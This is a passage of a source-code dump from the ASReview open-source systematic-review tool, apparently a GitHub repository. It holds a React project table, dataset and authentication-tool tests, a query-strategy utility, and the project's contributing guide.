false : true);\n };\n\n const hoverOffProject = () => {\n setHoverRowId(null);\n };\n\n const formatMode = (mode) => {\n if (mode === \"oracle\" || !mode) {\n return \"Oracle\";\n }\n if (mode === \"explore\") {\n return \"Exploration\";\n }\n if (mode === \"simulate\") {\n return \"Simulation\";\n }\n };\n\n /**\n * Return status label and style\n */\n const status = (project) => {\n if (\n project.reviews[0] === undefined ||\n project.reviews[0].status === projectStatuses.SETUP ||\n project.reviews[0].status === projectStatuses.ERROR\n ) {\n return [projectStatuses.SETUP, \"Setup\"];\n }\n if (project.reviews[0].status === projectStatuses.REVIEW) {\n return [projectStatuses.REVIEW, \"In Review\"];\n }\n if (project.reviews[0].status === projectStatuses.FINISHED) {\n return [projectStatuses.FINISHED, \"Finished\"];\n }\n };\n\n const statusStyle = (project) => {\n if (\n project.reviews[0] === undefined ||\n project.reviews[0].status === projectStatuses.SETUP ||\n project.reviews[0].status === projectStatuses.ERROR\n ) {\n return \"dashboard-page-table-chip setup\";\n }\n if (project.reviews[0].status === projectStatuses.REVIEW) {\n return \"dashboard-page-table-chip inreview\";\n }\n if (project.reviews[0].status === projectStatuses.FINISHED) {\n return \"dashboard-page-table-chip finished\";\n }\n };\n\n /**\n * Table pagination & rows per page setting\n */\n const handlePage = (event, newPage) => {\n setPage(newPage);\n };\n\n const setRowsPerPage = (event) => {\n handleRowsPerPage(+event.target.value);\n setPage(0);\n };\n\n return (\n <StyledPaper elevation={2} className={classes.root}>\n <TableContainer>\n <Table className={classes.table} stickyHeader aria-label=\"sticky table\">\n <TableHead>\n <TableRow>\n {columns.map((column) => (\n <TableCell key={column.id} style={{ width: column.width }}>\n {column.label}\n </TableCell>\n ))}\n </TableRow>\n </TableHead>\n <TableBody>\n {!isError &&\n !isFetching &&\n isFetched &&\n isSuccess &&\n myProjects\n ?.slice(page * rowsPerPage, page * rowsPerPage + rowsPerPage)\n .map((row) => {\n // if we do authentication, then we need to know who the owner is\n row[\"owner_id\"] =\n authenticated && \"owner_id\" in row\n ? 
row[\"owner_id\"]\n : false;\n // A collaborator can not edit\n const isOwner = authenticated && row[\"owner_id\"] === auth.id;\n\n const isSimulating = () => {\n return (\n row[\"mode\"] === projectModes.SIMULATION &&\n row[\"reviews\"][0] !== undefined &&\n row[\"reviews\"][0][\"status\"] === projectStatuses.REVIEW\n );\n };\n\n const showAnalyticsButton = () => {\n return (\n row[\"reviews\"][0] !== undefined &&\n !(\n row[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n )\n );\n };\n\n const showReviewButton = () => {\n return (\n row[\"reviews\"][0] !== undefined &&\n row[\"reviews\"][0][\"status\"] === projectStatuses.REVIEW\n );\n };\n\n const disableProjectStatusChange = () => {\n return (\n row[\"projectNeedsUpgrade\"] ||\n row[\"mode\"] === projectModes.SIMULATION ||\n row[\"reviews\"][0] === undefined ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n );\n };\n\n const onClickProjectAnalytics = () => {\n openProject(row, \"\");\n };\n\n const onClickProjectReview = () => {\n openProject(row, \"review\");\n };\n\n const onClickCollaboration = () => {\n openProject(row, \"team\");\n // ******* toggleCollaboDialog();\n };\n\n const onClickProjectExport = () => {\n if (\n row[\"reviews\"][0] === undefined ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n row[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n ) {\n queryClient.prefetchQuery(\n [\"fetchExportProject\", { project_id: row[\"id\"] }],\n ProjectAPI.fetchExportProject,\n );\n } else {\n openProject(row, \"export\");\n }\n };\n\n const onClickProjectDetails = () => {\n openProject(row, \"details\");\n };\n\n const updateProjectStatus = () => {\n handleChangeStatus(row);\n };\n return (\n <TableRow\n hover\n role=\"checkbox\"\n tabIndex={-1}\n key={row.id}\n onMouseEnter={() => {\n return hoverOnProject(\n row[\"id\"],\n row[\"name\"],\n row[\"owner_id\"],\n );\n }}\n onMouseLeave={() => hoverOffProject()}\n >\n <TableCell sx={{ display: \"flex\" }}>\n <Box className={classes.titleWrapper}>\n <Typography\n onClick={onClickProjectAnalytics}\n className={classes.title}\n variant=\"subtitle1\"\n >\n {row[\"name\"]}\n </Typography>\n <Box sx={{ flex: 1 }}></Box>\n {hoverRowId === row.id && (\n <TableRowButton\n disableProjectStatusChange={\n disableProjectStatusChange\n }\n isSimulating={isSimulating}\n isOwner={isOwner}\n showAnalyticsButton={showAnalyticsButton}\n showReviewButton={showReviewButton}\n onClickProjectAnalytics={onClickProjectAnalytics}\n onClickCollaboration={onClickCollaboration}\n onClickEndCollaboration={\n onClickCollaboration\n } /* !!!!!!!!! 
*/\n onClickProjectReview={onClickProjectReview}\n onClickProjectExport={onClickProjectExport}\n onClickProjectDetails={onClickProjectDetails}\n projectStatus={status(row)[0]}\n toggleDeleteDialog={toggleDeleteDialog}\n updateProjectStatus={updateProjectStatus}\n //canEdit={canEdit}\n />\n )}\n </Box>\n </TableCell>\n <TableCell>\n <Typography\n className={classes.tableCell}\n variant=\"subtitle1\"\n noWrap\n >\n {formatDate(row[\"created_at_unix\"])}\n </Typography>\n </TableCell>\n <TableCell>\n <Typography\n className={classes.tableCell}\n variant=\"subtitle1\"\n noWrap\n >\n {formatMode(row[\"mode\"])}\n </Typography>\n </TableCell>\n <TableCell className={classes.tableCell}>\n <Chip\n size=\"small\"\n className={statusStyle(row)}\n label={status(row)[1]}\n />\n </TableCell>\n </TableRow>\n );\n })}\n </TableBody>\n </Table>\n {!isError && isFetching && (\n <Box className={classes.loadingProjects}>\n <CircularProgress />\n </Box>\n )}\n {!isError &&\n !isFetching &&\n isFetched &&\n isSuccess &&\n myProjects.length === 0 && (\n <Box\n sx={{\n alignItems: \"center\",\n display: \"flex\",\n flexDirection: \"column\",\n }}\n >\n <Typography sx={{ color: \"text.secondary\", marginTop: \"64px\" }}>\n Your projects will show up here\n </Typography>\n <Button onClick={props.toggleProjectSetup}>Get Started</Button>\n <img\n src={ElasArrowRightAhead}\n alt=\"ElasArrowRightAhead\"\n className={classes.img}\n />\n </Box>\n )}\n {isError && !isFetching && (\n <Box className={classes.error}>\n <BoxErrorHandler error={error} queryKey=\"fetchProjects\" />\n </Box>\n )}\n </TableContainer>\n {!isError &&\n !isFetching &&\n isFetched &&\n isSuccess &&\n myProjects.length !== 0 && (\n <TablePagination\n rowsPerPageOptions={[5, 10, 15]}\n component=\"div\"\n count={myProjects.length}\n rowsPerPage={rowsPerPage}\n labelRowsPerPage=\"Projects per page:\"\n page={page}\n onPageChange={handlePage}\n onRowsPerPageChange={setRowsPerPage}\n />\n )}\n <ProjectCheckDialog\n projectCheck={props.projectCheck}\n setProjectCheck={props.setProjectCheck}\n />\n <ProjectDeleteDialog\n onDeleteDialog={onDeleteDialog}\n toggleDeleteDialog={toggleDeleteDialog}\n projectTitle={hoverRowTitle}\n project_id={hoverRowIdPersistent}\n isOwner={hoverIsOwner}\n />\n <DialogErrorHandler\n error={querySimulationError}\n isError={querySimulationError.isError}\n queryKey=\"fetchProjects\"\n />\n </StyledPaper>\n );\n};\n\nexport default connect(null, mapDispatchToProps)(ProjectTable);\n" }, { "alpha_fraction": 0.649965226650238, "alphanum_fraction": 0.6631872057914734, "avg_line_length": 25.61111068725586, "blob_id": "52d07f88e37e9f3057464d4b02821a1372a5e275", "content_id": "8f99f1d98edb492a07a4dbb356ab8ada8dfd66e2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2874, "license_type": "permissive", "max_line_length": 88, "num_lines": 108, "path": "/tests/test_datasets.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom asreview.datasets import BaseDataGroup\nfrom asreview.datasets import BaseDataSet\nfrom asreview.datasets import DatasetManager\nfrom asreview.datasets import NaturePublicationDataGroup\n\n\[email protected](\n \"data_id\",\n [\n \"benchmark:van_de_Schoot_2017\",\n \"benchmark:Hall_2012\",\n \"benchmark:Cohen_2006_ACEInhibitors\",\n \"benchmark:Bos_2018\",\n ],\n)\ndef test_datasets(data_id):\n data = DatasetManager().find(data_id)\n assert 
data.filepath.startswith(\"https://raw.githubusercontent.com/asreview/\")\n assert data.title is not None\n\n\ndef test_group():\n group_nature = NaturePublicationDataGroup()\n\n assert group_nature.group_id is not None\n\n assert len(group_nature.datasets) == 4\n\n for d in group_nature.datasets:\n assert d.filepath.startswith(\n \"https://raw.githubusercontent.com/asreview/paper-asreview\"\n )\n\n\ndef test_group_to_dict():\n group_nature = NaturePublicationDataGroup()\n\n assert isinstance(group_nature.__dict__(), dict)\n\n\ndef test_group_list():\n dm = DatasetManager()\n\n nature_group = dm.list(\n include=\"benchmark-nature\", raise_on_error=True, serialize=False\n )[0]\n\n assert len(nature_group.datasets) == 4\n\n for d in nature_group.datasets:\n assert d.filepath.startswith(\n \"https://raw.githubusercontent.com/asreview/paper-asreview\"\n )\n\n\ndef test_group_exclude_list():\n dm = DatasetManager()\n\n groups = dm.list(exclude=\"benchmark-nature\", raise_on_error=True, serialize=False)\n assert \"benchmark-nature\" not in [group.group_id for group in groups]\n\n groups = dm.list(exclude=[\"benchmark-nature\"], raise_on_error=True, serialize=False)\n assert \"benchmark-nature\" not in [group.group_id for group in groups]\n\n\ndef test_template_group():\n # START - use for building your plugin\n my_dataset1 = BaseDataSet(\n dataset_id=\"my_dataset1\", filepath=\"http\", title=\"My dataset\"\n )\n\n my_dataset2 = BaseDataSet(\n dataset_id=\"my_dataset2\",\n filepath=\"http\",\n title=\"My second dataset\",\n aliases=[\"J535\"],\n )\n\n class TemplateDataGroup(BaseDataGroup):\n group_id = \"template\"\n description = \"Template group\"\n\n def __init__(self):\n super(TemplateDataGroup, self).__init__(my_dataset1, my_dataset2)\n\n # END\n\n my_group = TemplateDataGroup()\n\n my_group.find(\"my_dataset1\").title == \"My dataset\"\n my_group.find(\"j535\").title == \"My second dataset\" # see lowercase alias\n\n\[email protected](raises=TypeError)\ndef test_template_group_abc():\n my_dataset1 = BaseDataSet(\n dataset_id=\"my_dataset2\",\n filepath=\"http\",\n title=\"My second dataset\",\n aliases=[\"J535\"],\n )\n\n class TemplateDataGroup(BaseDataGroup):\n description = \"Template group\"\n\n TemplateDataGroup(my_dataset1)\n" }, { "alpha_fraction": 0.6765119433403015, "alphanum_fraction": 0.6849507689476013, "avg_line_length": 32.85714340209961, "blob_id": "90d4f87f5d854984be624f2ad0c909096fab170b", "content_id": "2b0fc379a1a6fbb68bb50aad8698c696094e3ed1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 711, "license_type": "permissive", "max_line_length": 77, "num_lines": 21, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/UserListEntry.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import ListItem from \"@mui/material/ListItem\";\nimport ListItemAvatar from \"@mui/material/ListItemAvatar\";\nimport ListItemText from \"@mui/material/ListItemText\";\nimport PersonIcon from \"@mui/icons-material/Person\";\nimport Avatar from \"@mui/material/Avatar\";\nimport { blue } from \"@mui/material/colors\";\n\nconst UserListEntry = (props) => {\n return (\n <ListItem button onDoubleClick={() => props.onDoubleClick(props.user)}>\n <ListItemAvatar>\n <Avatar sx={{ bgcolor: blue[100], color: blue[600] }}>\n <PersonIcon />\n </Avatar>\n </ListItemAvatar>\n <ListItemText primary={props.user.name} secondary={props.user.email} />\n </ListItem>\n );\n};\n\nexport default 
UserListEntry;\n" }, { "alpha_fraction": 0.6631016135215759, "alphanum_fraction": 0.6689353585243225, "avg_line_length": 27.971830368041992, "blob_id": "ee9861d9318c03a00876eea465e8e16686c2da45", "content_id": "df0dd628125d78c68c825748648fe97a57d0b745", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2057, "license_type": "permissive", "max_line_length": 75, "num_lines": 71, "path": "/asreview/models/query/utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.utils import _entry_points\n\n\ndef list_query_strategies():\n \"\"\"List available query strategy classes.\n\n This excludes all possible mixed query strategies.\n\n Returns\n -------\n list\n Classes of available query strategies in alphabetical order.\n \"\"\"\n return [e.load() for e in _entry_points(group=\"asreview.models.query\")]\n\n\ndef get_query_class(name):\n \"\"\"Get class of query strategy from its name.\n\n Arguments\n ---------\n name: str\n Name of the query strategy, e.g. 'max', 'uncertainty', 'random.\n A special mixed query strategy is als possible. The mix is denoted\n by an underscore: 'max_random' or 'max_uncertainty'.\n\n Returns\n -------\n class\n Class corresponding to the name name.\n \"\"\"\n\n return _entry_points(group=\"asreview.models.query\")[name].load()\n\n\ndef get_query_model(name, *args, random_state=None, **kwargs):\n \"\"\"Get an instance of the query strategy.\n\n Arguments\n ---------\n name: str\n Name of the query strategy.\n *args:\n Arguments for the model.\n **kwargs:\n Keyword arguments for the model.\n\n Returns\n -------\n asreview.query.base.BaseQueryModel\n Initialized instance of query strategy.\n \"\"\"\n query_class = get_query_class(name)\n try:\n return query_class(*args, random_state=random_state, **kwargs)\n except TypeError:\n return query_class(*args, **kwargs)\n" }, { "alpha_fraction": 0.77073734998703, "alphanum_fraction": 0.7724654674530029, "avg_line_length": 52.41538619995117, "blob_id": "bac221abf52d56d8bb37971fde0eede6b5c97bc7", "content_id": "e4b964d01acfac57a8eda9c78c19f356d8353b70", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3490, "license_type": "permissive", "max_line_length": 161, "num_lines": 65, "path": "/CONTRIBUTING.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Contributing to ASReview\nHello dear contributor-to-be! 
:wave:\n\nAwesome to see that you're considering contributing to ASReview!\nBelow you will find some guidelines for your future contributions.\n\n#### Feel free to propose changes of any kind!\nYour ideas and input are very much appreciated.\nFrom contributing to source code to improving readability of the documentation, all suggestions are welcome!\n\nThere are multiple ways to contribute:\n- [Reporting bugs](#reporting-bugs) :bug: :ant: 🐞\n- [Suggesting enhancements](#feature-request)\n- [Contribute code](#contribute-code)\n- [Contribute in discussions](#discussions)\n\n## Reporting bugs\nIs something not working as expected 🤔?\n\nCreate an [issue](https://github.com/asreview/asreview/issues/new/choose) and select `Bug report 🐛`.\n\n## Feature request\nDo you have a suggestion (and may want to implement it 🙂)?\n\nCreate an [issue](https://github.com/asreview/asreview/issues/new/choose) and use the `🚀 Feature request` template.\n\n## Contribute code\nWant to try to fix the bug you found?\nBuild your feature request yourself?\nBrilliant! :heart_eyes:\nYou can submit your changes to ASReview [by creating a pull request](https://github.com/asreview/asreview/pull/new/master).\n\n#### Unsure where to begin? Here are a few examples: \n- Improve the [documentation](https://asreview.readthedocs.io/en/latest/). :memo:\n- Propose a fix to an existing issue. :warning:\n  - See the [issue list here](https://github.com/asreview/asreview/issues).\n- Add a new dataset to [our open dataset repository](https://github.com/asreview/systematic-review-datasets/)\n  - See this [pull request](https://github.com/asreview/systematic-review-datasets/pull/11) for an example.\n- Looking to develop your own extension? :electric_plug:\n  - See [create extensions](https://asreview.readthedocs.io/en/latest/extensions_dev.html) for detailed instructions.\n  - See the current [list of extensions](https://github.com/asreview/asreview/discussions/1140)\n\n## Discussions\nGot any questions for the ASReview community?\nOr perhaps you know the answer to a question asked? 💡\nDon't hesitate to post on the [discussion board](https://github.com/asreview/asreview/discussions).\n\n## First timer?\nDo you have little experience with contributing to open-source projects and working with GitHub? :octocat: No worries! There are some amazing tutorials out there:\n\n- [First timers only](https://www.firsttimersonly.com)\n  - See the [first-contributions repo](https://github.com/firstcontributions/first-contributions) for a tutorial on how to contribute code.\n- [How To Contribute To An Open Source Project on GitHub](https://egghead.io/courses/how-to-contribute-to-an-open-source-project-on-github).\n- [Mastering Issues](https://guides.github.com/features/issues/) by GitHub.\n- [About Pull Requests](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests/about-pull-requests) by GitHub.\n\n## Life after the pull request\nYour pull request will be carefully reviewed by the maintainers.\nThey will get back to you as soon as possible and possibly start integrating your suggestions and/or contributions into the project.\n\n## Need more information?\nIf you have any more questions, do not hesitate to send an e-mail to [email protected].\nYou can also [sign up for the newsletter](https://asreview.ai/newsletter/subscribe) for the latest updates on ASReview straight to your inbox! :email:\n\nThanks again for your contribution, the ASReview team. 
:yellow_heart:\n" }, { "alpha_fraction": 0.6547278165817261, "alphanum_fraction": 0.663536012172699, "avg_line_length": 33.771217346191406, "blob_id": "bc4692c1573f8073b6fd43508ea2c51588bd6c4c", "content_id": "01c01b4ce3b957f6280f601c99db009d1efc8b01", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18846, "license_type": "permissive", "max_line_length": 77, "num_lines": 542, "path": "/asreview/webapp/tests/test_extensions/test_auth_tool.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import json\nfrom argparse import Namespace\nfrom pathlib import Path\nfrom unittest.mock import patch\nfrom uuid import uuid4\n\nimport pytest\n\nimport asreview.entry_points.auth_tool as tool\nfrom asreview.entry_points.auth_tool import AuthTool\nfrom asreview.state.sql_converter import upgrade_asreview_project_file\nfrom asreview.utils import asreview_path\nfrom asreview.webapp import DB\nfrom asreview.webapp.tests.utils import api_utils as au\nfrom asreview.webapp.tests.utils import config_parser as cp\nfrom asreview.webapp.tests.utils import crud\nfrom asreview.webapp.tests.utils import misc\n\n\ndef get_auth_tool_object(namespace):\n \"\"\"This function returns an AuthTool object in which\n the session feature is set to the test database and\n the args feature is set with the <namespace> input\n parameter.\"\"\"\n tool = AuthTool()\n # manipulate the DB session\n tool.session = DB.session\n tool.args = namespace\n return tool\n\n\ndef interactive_user_data():\n \"\"\"This function returns a list of strings that can be\n used to trigger an interactively created user account.\"\"\"\n user_data = cp.get_user_data(1)\n return [\n \"Y\",\n user_data[\"email\"],\n user_data[\"name\"],\n user_data[\"affiliation\"],\n user_data[\"password\"],\n \"n\",\n ]\n\n\ndef import_2_unauthenticated_projects(with_upgrade=True):\n \"\"\"This function retrieves 2 zipped project (version 0.x)\n files from github and copies them in the asreview folder.\n To use them in tests they need to be upgraded. 
Both projects\n are returned.\"\"\"\n # get 2 unauthenticated projects\n url1 = misc.retrieve_project_url_github(\"v0.19\")\n url2 = misc.retrieve_project_url_github(\"v0.18\")\n # import projects\n proj1 = misc.copy_github_project_into_asreview_folder(url1)\n proj2 = misc.copy_github_project_into_asreview_folder(url2)\n if with_upgrade:\n # update these projects to a 1.x-ish config\n upgrade_asreview_project_file(proj1.project_path)\n upgrade_asreview_project_file(proj2.project_path)\n return proj1, proj2\n\n\n# Test verifying uuid: correct\ndef test_verify_id_correct_id():\n id = uuid4().hex\n assert tool.verify_id(id)\n\n\n# Test verifying uuid: incorrect id\ndef test_verify_id_incorrect_id():\n id = \"incorrect-id\"\n assert not tool.verify_id(id)\n\n\n# Test inserting a user into the database\ndef test_insert_user(client_auth):\n # count users\n assert crud.count_users() == 0\n # get some user credentials\n user_data = cp.get_user_data(1)\n # insert the returned dictionary\n tool.insert_user(DB.session, user_data)\n # count users again\n assert crud.count_users() == 1\n # get user\n user = crud.last_user()\n assert user.email == user_data[\"email\"]\n assert user.identifier == user_data[\"email\"]\n assert user.origin == \"asreview\"\n assert user.name == user_data[\"name\"]\n assert user.affiliation == user_data[\"affiliation\"]\n assert user.confirmed\n\n\n# Test inserting a duplicate\ndef test_insert_user_duplicate(client_auth):\n # count users\n assert crud.count_users() == 0\n # get some user credentials\n user_data = cp.get_user_data(1)\n # insert the returned dictionary\n tool.insert_user(DB.session, user_data)\n # verify user has been created\n assert crud.count_users() == 1\n # and again\n result = tool.insert_user(DB.session, user_data)\n # asserts\n assert not result\n # no inserts, count remains 1\n assert crud.count_users() == 1\n\n\n# Test inserting a project record in the database\ndef test_inserting_a_project_record(client_auth):\n # count projects\n assert crud.count_projects() == 0\n # insert this data\n data = {\"project_id\": uuid4().hex, \"owner_id\": 2}\n tool.insert_project(DB.session, data)\n # count again\n assert crud.count_projects() == 1\n # get last record\n project = crud.last_project()\n assert project.project_id == data[\"project_id\"]\n assert project.owner_id == data[\"owner_id\"]\n\n\n# Test updating a project record in the database\ndef test_updating_a_project_record(client_auth):\n # count projects\n assert crud.count_projects() == 0\n # insert this data\n data = {\"project_id\": uuid4().hex, \"owner_id\": 2}\n tool.insert_project(DB.session, data)\n # count again\n assert crud.count_projects() == 1\n # change owner id\n data[\"owner_id\"] = 3\n tool.insert_project(DB.session, data)\n # count again, no inserts, count remains 1\n assert crud.count_projects() == 1\n project = crud.last_project()\n assert project.project_id == data[\"project_id\"]\n assert project.owner_id == data[\"owner_id\"]\n\n\n# Test get users\ndef test_get_users(client_auth):\n # create 2 users\n user1 = crud.create_user(DB, 1)\n user2 = crud.create_user(DB, 2)\n print(user1, user2)\n assert crud.count_users() == 2\n # test function\n result = tool.get_users(DB.session)\n assert set(result) == set([user1, user2])\n\n\n# ####################\n# Test AuthTool Object\n# ####################\n\n\n# insert users with json string\ndef test_auth_tool_add_users_with_json(client_auth):\n # assert we have no users\n assert crud.count_users() == 0\n # build appropriate json argument\n 
user_data = cp.get_user_data(1)\n    namespace = Namespace(json=f\"{json.dumps([user_data])}\")\n    # get auth_tool object\n    auth_tool = get_auth_tool_object(namespace)\n    # execute add users function\n    auth_tool.add_users()\n    # assert we now have a user\n    assert crud.count_users() == 1\n    user = crud.last_user()\n    # quick asserts, we have already tested this in\n    # test_insert_user\n    assert user.email == user_data[\"email\"]\n    assert user.identifier == user_data[\"email\"]\n\n\n# insert users interactively, correct input\ndef test_auth_tool_add_users_interact(client_auth):\n    # assert we have no users\n    assert crud.count_users() == 0\n    # get auth_tool object\n    auth_tool = get_auth_tool_object(Namespace(json=None))\n    # build interactive input\n    answers = interactive_user_data()\n    with patch('builtins.input', side_effect=answers):\n        auth_tool.add_users()\n    # assert we now have a user\n    assert crud.count_users() == 1\n\n\n# insert users interactively, incorrect email\ndef test_auth_tool_add_users_interact_incorr_email(client_auth, capsys):\n    \"\"\"This test interactively inserts a user account, but\n    an invalid email address is provided\"\"\"\n    # assert we have no users\n    assert crud.count_users() == 0\n    # get auth_tool object\n    auth_tool = get_auth_tool_object(Namespace(json=None))\n    # build interactive input\n    answers = interactive_user_data()\n    # add in a faulty email address\n    answers.insert(1, \"abcd@\")\n    with patch('builtins.input', side_effect=answers):\n        auth_tool.add_users()\n    _, err = capsys.readouterr()\n    assert \"Entered email address is not recognized\" in err\n    # assert we now have a user\n    assert crud.count_users() == 1\n\n\n# insert users interactively, name too short\ndef test_auth_tool_add_users_interact_incorr_name(client_auth, capsys):\n    \"\"\"This test interactively inserts a user account, but\n    a short name is provided\"\"\"\n    # assert we have no users\n    assert crud.count_users() == 0\n    # get auth_tool object\n    auth_tool = get_auth_tool_object(Namespace(json=None))\n    # build interactive input\n    answers = interactive_user_data()\n    # add in a name that is too short\n    answers.insert(2, \"ab\")\n    with patch('builtins.input', side_effect=answers):\n        auth_tool.add_users()\n    _, err = capsys.readouterr()\n    assert \"Full name must contain more than 2\" in err\n    # assert we now have a user\n    assert crud.count_users() == 1\n\n\n# insert users interactively, bad password\ndef test_auth_tool_add_users_interact_incorr_passw(client_auth, capsys):\n    \"\"\"This test interactively inserts a user account, but\n    an invalid password is provided\"\"\"\n    # assert we have no users\n    assert crud.count_users() == 0\n    # get auth_tool object\n    auth_tool = get_auth_tool_object(Namespace(json=None))\n    # build interactive input\n    answers = interactive_user_data()\n    # add in a password that is too weak\n    answers.insert(4, \"1111\")\n    with patch('builtins.input', side_effect=answers):\n        auth_tool.add_users()\n    _, err = capsys.readouterr()\n    assert \"Use 8 or more characters with a mix\" in err\n    # assert we now have a user\n    assert crud.count_users() == 1\n\n\n# Test validity check. 
Note: this and the next test can not\n# be parametrized because of the tested function: it -needs-\n# to be finished with a correct value\ndef test_validity_function_valid(capsys):\n \"\"\"Tests the _ensure_valid_value_for method, expects\n no error messages if the input value respects the\n lambda function.\"\"\"\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # define a correct value\n correct = \"a\"\n hint = \"Test hint\"\n # run function with patched input\n with patch('builtins.input', side_effect=[correct]):\n # run validity function\n auth_tool._ensure_valid_value_for(\n \"test\", lambda x: x == correct, hint=hint\n )\n out, err = capsys.readouterr()\n assert not bool(out)\n assert not bool(err)\n\n\n# Test validity check, see remark previous test if you notice\n# the repetition\ndef test_validity_function_invalid(capsys):\n \"\"\"Tests the _ensure_valid_value_for method, expects\n error messages if the input value does not respect the\n lambda function.\"\"\"\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # define a correct value\n correct = \"a\"\n incorrect = \"b\"\n hint = \"Test hint\"\n # run function with patched input\n with patch('builtins.input', side_effect=[incorrect, correct]):\n # run validity function\n auth_tool._ensure_valid_value_for(\n \"test\", lambda x: x == correct, hint=hint\n )\n out, err = capsys.readouterr()\n assert not bool(out)\n assert err == hint\n\n\n# Test printing a project\ndef test_print_project(capsys):\n keys = [\"folder\", \"version\", \"project_id\", \"name\", \"authors\", \"created\"]\n data = {k: uuid4().hex for k in keys}\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool._print_project(data)\n out, _ = capsys.readouterr()\n assert f\"* {data['folder']}\" in out\n assert f\"version: {data['version']}\" in out\n assert f\"id: {data['project_id']}\" in out\n assert f\"name: {data['name']}\" in out\n assert f\"authors: {data['authors']}\" in out\n assert f\"created: {data['created']}\" in out\n\n\n# Test printing a user with affiliation\ndef test_print_user_with_affiliation(client_auth, capsys):\n user = crud.create_user(DB, 1)\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool._print_user(user)\n out, _ = capsys.readouterr()\n expected = f\"{user.id} - {user.email} ({user.name}), {user.affiliation}\"\n assert out.strip() == expected\n\n\n# Test printing a user without affiliation\ndef test_print_user_without_affiliation(client_auth, capsys):\n user = crud.create_user(DB, 1)\n user.affiliation = None\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool._print_user(user)\n out, _ = capsys.readouterr()\n expected = f\"{user.id} - {user.email} ({user.name})\"\n assert out.strip() == expected\n\n\n# Testing _get_projects\ndef test_get_projects(client_no_auth):\n # create a project\n _, data = au.create_project(client_no_auth, \"test\")\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n result = auth_tool._get_projects()\n assert isinstance(result, list)\n assert len(result) == 1\n result = result[0]\n assert result[\"folder\"] == data[\"id\"]\n assert result[\"version\"] == data[\"version\"]\n assert result[\"project_id\"] == data[\"id\"]\n assert result[\"name\"] == data[\"name\"]\n assert result[\"authors\"] == data[\"authors\"]\n assert 
result[\"created\"] == data[\"datetimeCreated\"]\n assert result[\"owner_id\"] == 0\n\n\n# Test listing users\ndef test_list_users(client_auth, capsys):\n # create 2 users\n u1 = crud.create_user(DB, 1)\n u2 = crud.create_user(DB, 2)\n assert crud.count_users() == 2\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool.list_users()\n out, _ = capsys.readouterr()\n exp1 = f\"{u1.id} - {u1.email} ({u1.name}), {u1.affiliation}\"\n exp2 = f\"{u2.id} - {u2.email} ({u2.name}), {u2.affiliation}\"\n assert exp1 in out\n assert exp2 in out\n\n\n# Test list projects: no json data\ndef test_list_projects_no_json(client_no_auth, capsys):\n # create two projects\n _, data1 = au.create_project(client_no_auth, \"test1\")\n _, data2 = au.create_project(client_no_auth, \"test2\")\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=None))\n # run function\n auth_tool.list_projects()\n out, _ = capsys.readouterr()\n # we have already tested _print_project, so I will keep\n # it short\n assert f\"* {data1['id']}\" in out\n assert f\"* {data2['id']}\" in out\n assert f\"name: {data1['name']}\" in out\n assert f\"name: {data2['name']}\" in out\n\n\n# Test list projects: output is a json string\ndef test_list_projects_with_json(client_no_auth, capsys):\n # create two projects\n _, data1 = au.create_project(client_no_auth, \"test1\")\n _, data2 = au.create_project(client_no_auth, \"test2\")\n data = {\n data1.get(\"id\"): data1,\n data2.get(\"id\"): data2\n }\n # get auth_tool object\n auth_tool = get_auth_tool_object(Namespace(json=True))\n # run function\n auth_tool.list_projects()\n out, _ = capsys.readouterr()\n # this loads the out json string into a list of dicts\n out = json.loads(json.loads(out))\n assert isinstance(out, list)\n assert len(out) == 2\n for proj in out:\n expected = data[proj[\"project_id\"]]\n assert proj[\"folder\"] == expected[\"id\"]\n assert proj[\"version\"] == expected[\"version\"]\n assert proj[\"project_id\"] == expected[\"id\"]\n assert proj[\"name\"] == expected[\"name\"]\n assert proj[\"authors\"] == expected[\"authors\"]\n assert proj[\"created\"] == expected[\"datetimeCreated\"]\n assert proj[\"owner_id\"] == 0\n\n\n# Test linking projects to users with a json string\n# Note: We can not simulate a conversion from an unauthenticated\n# app into an authenticated one. To overcome this problem, 2 old\n# project zip files (version 0.x) are copied from Github into the\n# asreview folder and upgraded. 
